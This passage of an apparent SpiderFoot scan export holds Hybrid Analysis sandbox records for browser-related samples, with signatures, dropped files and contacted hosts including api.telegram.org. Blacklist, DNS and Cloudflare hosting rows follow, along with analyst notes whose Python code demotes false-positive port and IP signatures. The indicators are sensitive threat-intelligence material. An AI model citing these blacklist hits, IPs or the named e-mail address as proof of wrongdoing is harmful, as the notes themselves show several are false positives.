"Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7328:304:WilStaging_02"\n "Local\\SM0:7328:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7188:304:WilStaging_02"\n "Local\\SM0:7188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"104.22.58.100:49728"\n "185.199.109.153:49730"\n "13.35.125.109:49731"\n "149.154.167.220:49732"\n "51.11.192.48:49736"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - Possible RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'Internal YARA signature for possible RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-38', u'name': u'Drops PE files with different extensions', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7544_1106606490\\Part-RU]- [targetUID: 00000000-00007544]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007544]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007544]\n "21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp]- [targetUID: 00000000-00007544]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.json]- [targetUID: 00000000-00007544]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007544]\n "2e8e03b2-b8a9-4702-ad28-272010504828.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\2e8e03b2-b8a9-4702-ad28-272010504828.tmp]- [targetUID: 00000000-00007544]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00007544]\n "Session_13320464616168949" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13320464616168949]- [targetUID: 00000000-00007544]\n "645c73c7-b711-4558-a7af-9f09cc1391b4.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\645c73c7-b711-4558-a7af-9f09cc1391b4.tmp]- [targetUID: 00000000-00007544]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7544_1106606490\\Filtering Rules-AA]- [targetUID: 00000000-00007544]\n "608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp]- [targetUID: 00000000-00007544]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\shoppingfre.js]- [targetUID: 00000000-00007544]\n "8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- 
Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp]- [targetUID: 00000000-00007544]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007272]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007544]\n "7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp]- [targetUID: 00000000-00007544]\n "LOG" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\LOG]- [targetUID: 00000000-00007544]\n "manifest.fingerprint" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00007544]\n "Variations" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00007544]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was 
make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'QtjLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydg"\n Heuristic match: "api.telegram.org"\n Heuristic match: "getbootstrap.com"\n Heuristic match: "fernando.r@alliedglobal.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Pattern match: "fernando.r@alliedglobal.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/60 Antivirus vendors marked sample as malicious (16% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-7', u'name': u'Uses network protocols on unusual ports', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1571', u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': u'T1571', u'relevance': 7, u'threat_level': 2, u'type': 7, 
u'description': u'TCP traffic to 104.22.58.100 on port 49728\n TCP traffic to 185.199.109.153 on port 49730\n TCP traffic to 13.35.125.109 on port 49731\n TCP traffic to 149.154.167.220 on port 49732\n TCP traffic to 51.11.192.48 on port 49736'}], u'threat_level': 2, u'size': 102455, u'job_id': u'63e596ab38f3a44d604cd090', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None |
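
Analyst note on the Hybrid Analysis record above: the only signature scored "malicious" (network-7, T1571, "unusual ports") lists sequential ports 49728 to 49736, which sit in the IANA dynamic range (49152 to 65535) and are consistent with the sandbox VM's own source ports rather than services listening on odd ports; the string-14 "potential IP" 10.34.0.41 is the version directory of Edge's Subresource Filter ruleset, not an address. The indicator in this record worth keeping is the api.telegram.org string match, which the 149.154.167.220 destination (Telegram address space) corroborates. The following triage pass is an added example written for this page, not part of SpiderFoot or Hybrid Analysis; the signature dicts are a constructed, trimmed copy of the ones in the record, and the "ephemeral port" and "IP as path component" rules are this example's own heuristics.

```python
import ipaddress
import re

# Constructed sample: three signatures copied (trimmed) from the Hybrid Analysis
# record above, in the same dict shape the report uses.
SAMPLE_SIGNATURES = [
    {"identifier": "network-7", "name": "Uses network protocols on unusual ports",
     "attck_id": "T1571", "threat_level": 2, "threat_level_human": "malicious",
     "description": "TCP traffic to 104.22.58.100 on port 49728\n"
                    "TCP traffic to 185.199.109.153 on port 49730\n"
                    "TCP traffic to 149.154.167.220 on port 49732"},
    {"identifier": "string-14", "name": "Found potential IP address in binary/memory",
     "attck_id": None, "threat_level": 0, "threat_level_human": "informative",
     "description": 'Potential IP "10.34.0.41" found in string '
                    '"%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter'
                    '\\Indexed Rules\\35\\10.34.0.41"'},
    {"identifier": "string-63", "name": "Found a potential E-Mail address in binary/memory",
     "attck_id": "T1114", "threat_level": 1, "threat_level_human": "suspicious",
     "description": 'Pattern match: "fernando.r@alliedglobal.com"'},
]

EPHEMERAL_START = 49152  # IANA dynamic/private port range is 49152-65535
PORT_RE = re.compile(r"TCP traffic to (\S+) on port (\d+)")
IP_IN_STRING_RE = re.compile(r'Potential IP "([^"]+)" found in string "([^"]+)"')


def ephemeral_port_hits(sig):
    """(ip, port) pairs in an 'unusual ports' signature whose port is in the
    ephemeral range. Sequential ports there look like the sandbox's own source
    ports, not a listener on an odd port (this example's heuristic)."""
    return [(ip, int(p)) for ip, p in PORT_RE.findall(sig["description"])
            if int(p) >= EPHEMERAL_START]


def ip_is_path_component(sig):
    """True when the matched 'IP' is private/reserved or appears as a path
    segment (a dotted version number used as a directory name)."""
    m = IP_IN_STRING_RE.search(sig["description"])
    if not m:
        return False
    ip, context = m.groups()
    addr = ipaddress.ip_address(ip)
    return addr.is_private or ("\\" + ip) in context or ("/" + ip) in context


def triage(signatures):
    """Re-score each signature, demoting the two false-positive shapes above.
    Returns (identifier, original_level, adjusted_level, reason) per signature."""
    out = []
    for sig in signatures:
        level, reason = sig["threat_level"], "kept"
        if sig["identifier"].startswith("network-") and "unusual ports" in sig["name"]:
            hits = ephemeral_port_hits(sig)
            total = len(PORT_RE.findall(sig["description"]))
            if hits and len(hits) == total:
                level, reason = 0, "all %d ports are ephemeral source ports" % total
        elif sig["name"].startswith("Found potential IP") and ip_is_path_component(sig):
            level, reason = 0, "IP-shaped string is a path/version component"
        out.append((sig["identifier"], sig["threat_level"], level, reason))
    return out


def overall_threat_level(signatures):
    """Highest adjusted level, on the report's own 0/1/2 scale."""
    return max((lvl for _, _, lvl, _ in triage(signatures)), default=0)


if __name__ == "__main__":
    for row in triage(SAMPLE_SIGNATURES):
        print(row)
    print("adjusted overall threat_level:", overall_threat_level(SAMPLE_SIGNATURES))
```

With the two demotions applied the record's overall level drops from 2 to 1, carried only by the e-mail address and the 10/60 AV hit; the "unusual ports" signature alone should never be the reason a sample is escalated.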
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:8080 | 188.114.96.1 |
| 2023-05-12 02:46:16 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub, Inc. is an Internet hosting service for software development and version control using Git. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project. Headquartered in California, it has been a subsidiary of Microsoft since 2018. It is commonly used to host open source software development projects. As of January 2023, GitHub reported having over 100 million developers and more than 372 million repositories, including at least 28 million public repositories. It is the largest source code host as of November 2021. | battleb0t.github.io |
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.98 | 87.248.157.102 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | fluid.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://fluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://fluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] |
| 2023-05-12 03:38:38 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.167) | 207.154.228.167 |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (172.67.135.9): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 172.67.135.9 |
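
Analyst note on the IP-centred rows above: 188.114.96.1, 172.64.80.1, 172.67.135.9, 2a06:98c1:3121::1 and 2606:4700:3037::6815:470e are all Cloudflare anycast edge addresses. The domains Censys lists as resolving to them are unrelated tenants behind the same edge, a honeypot/blacklist hit on such an address reflects other tenants' traffic, and the "Open TCP Port" findings are the edge's listeners, not the origin's. The check below is an added example written for this page (not SpiderFoot code) that gates the co-hosting inference on whether the address is in a shared CDN range; the range list is a snapshot of Cloudflare's published ranges as this example's author knows them, an assumption to refresh from https://www.cloudflare.com/ips/ before use, and the Censys-shaped record is a constructed, trimmed sample.

```python
import ipaddress

# Assumption: snapshot of Cloudflare's published edge ranges (IPv4 and IPv6).
# Refresh from https://www.cloudflare.com/ips/ before relying on it.
CLOUDFLARE_RANGES = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
    "2400:cb00::/32", "2606:4700::/32", "2803:f800::/32", "2405:b500::/32",
    "2405:8100::/32", "2a06:98c0::/29", "2c0f:f248::/32",
)]


def is_cloudflare_edge(ip):
    """True when ip (v4 or v6, as a string) falls in a known Cloudflare range.
    ipaddress handles the version mismatch: a v4 address is never 'in' a v6 net."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_RANGES)


# Constructed sample in the shape of the Censys "ip" / "dns.records" fields
# above, trimmed to three of the names that resolve to 188.114.96.1.
SAMPLE_CENSYS = {
    "ip": "188.114.96.1",
    "dns": {"records": {
        "landing.makingprojec.com": {"record_type": "A"},
        "smtp.sharoshop.com": {"record_type": "A"},
        "939394.xyz": {"record_type": "A"},
    }},
}


def cohosting_verdict(record, seed_domain):
    """Decide whether the other names resolving to record['ip'] say anything
    about seed_domain. On a shared CDN edge they do not; on an address outside
    the known CDN ranges they may share an operator and are returned for review."""
    ip = record["ip"]
    others = sorted(d for d in record["dns"]["records"] if d != seed_domain)
    if is_cloudflare_edge(ip):
        return {"ip": ip, "shared_edge": True, "related": [],
                "note": "Cloudflare anycast address; co-resolving names are unrelated tenants"}
    return {"ip": ip, "shared_edge": False, "related": others,
            "note": "address not in a known CDN range; co-hosted names may share an operator"}


if __name__ == "__main__":
    for ip in ("188.114.96.1", "172.67.135.9", "2a06:98c1:3121::1",
               "207.154.228.167", "104.196.30.220"):
        print(ip, "cloudflare edge" if is_cloudflare_edge(ip) else "not a known CDN edge")
    print(cohosting_verdict(SAMPLE_CENSYS, "939394.xyz"))
```

The same gate belongs in front of any "Affiliate", "Co-Hosted Site" or blacklist-derived finding: apply reputation and co-hosting logic only to addresses that fail is_cloudflare_edge (and whatever other CDN or shared-hosting ranges the scan population needs).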
| 2023-05-12 02:56:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.opinionsbildarna.se/manifest.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar15A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "184.31.135.120:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\IsoScope_948_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_948_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_948_IESQMMUTEX_0_519"\n "IsoScope_948_IE_EarlyTabStart_0x96c_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_948_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2376"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_948_ConnHashTable<2376>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab159.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- 
Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003848]\n "WFXJLKMZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WFXJLKMZ.txt]- [targetUID: 00000000-00002376]\n "manifest_1_.webmanifest" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFFAAD4CD900CEC332.TMP" has type "data"- Location: [%TEMP%\\~DFFAAD4CD900CEC332.TMP]- [targetUID: 00000000-00002376]\n "~DF3FFEC317C0D185F4.TMP" has type "data"- Location: [%TEMP%\\~DF3FFEC317C0D185F4.TMP]- [targetUID: 00000000-00002376]\n "_C4F83231-322A-11ED-9777-0800272EAECA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002376]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003848]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002376]\n "AA3B58698007BC824A9E81451B820AFD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\AA3B58698007BC824A9E81451B820AFD]- [targetUID: 00000000-00003848]\n "_48B0BBD4-322D-11ED-9777-0800272EAECA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n 
"RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "QWM3ZIWJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QWM3ZIWJ.txt]- [targetUID: 00000000-00003848]\n "~DF34206CEDA4E061F8.TMP" has type "data"- Location: [%TEMP%\\~DF34206CEDA4E061F8.TMP]- [targetUID: 00000000-00002376]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002376]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.opinionsbildarna.se/manifest.webmanifest"\n Pattern match: "https://www.opinionsbildarna.se"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Pattern match: "www.opinionsbildarna.se"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.opinionsbildarna.se\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: 
bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 989\nContent-Type: application/octet-stream\nDate: Mon, 12 Sep 2022 01:26:03 GMT\nEtag: "9af86af75fb7ff64f2c69342f94824f7-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GCQMVBVYJY64KT58P2H0V8CG\n\n{"name":"opinionsbildarna","short_name":"opinionsbildarna","start_url":"/","background_color":"#663399","theme_color":"#663399","display":"minimal-ui","icons":[{"src":"icons/icon-48x48.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"48x48","type":"image/png"},{"src":"icons/icon-72x72.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"72x72","type":"image/png"},{"src":"icons/icon-96x96.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"96x96","type":"image/png"},{"src":"icons/icon-144x144.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"144x144","type":"image/png"},{"src":"icons/icon-192x192.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"192x192","type":"image/png"},{"src":"icons/icon-256x256.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"256x256","type":"image/png"},{"src":"icons/icon-384x384.png?v=7434068eaf17e8601"- [Source: SSL_104.196.30.220]\n, "e02a866de2e7a8e","sizes":"384x384","type":"image/png"},{"src":"icons/icon-512x512.png?v=7434068eaf17e8601e02a866de2e7a8e","sizes":"512x512","type":"image/png"}]}"- [Source: SSL_104.196.30.220]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.opinionsbildarna.se\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 404 Not Found\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Encoding: gzip\nContent-Type: text/html; charset=utf-8\nDate: Mon, 12 Sep 2022 01:26:05 GMT\nEtag: 1565395025-ssl-df\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nVary: Accept-Encoding\nX-Nf-Request-Id: 01GCQMVDN4B9431AR7ABBHYQ23\nTransfer-Encoding: chunked"- 
[Source: SSL_104.196.30.220]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artif | 104.196.30.220 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.battleb0t.xyz | [{"url": "https://www.battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://www.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
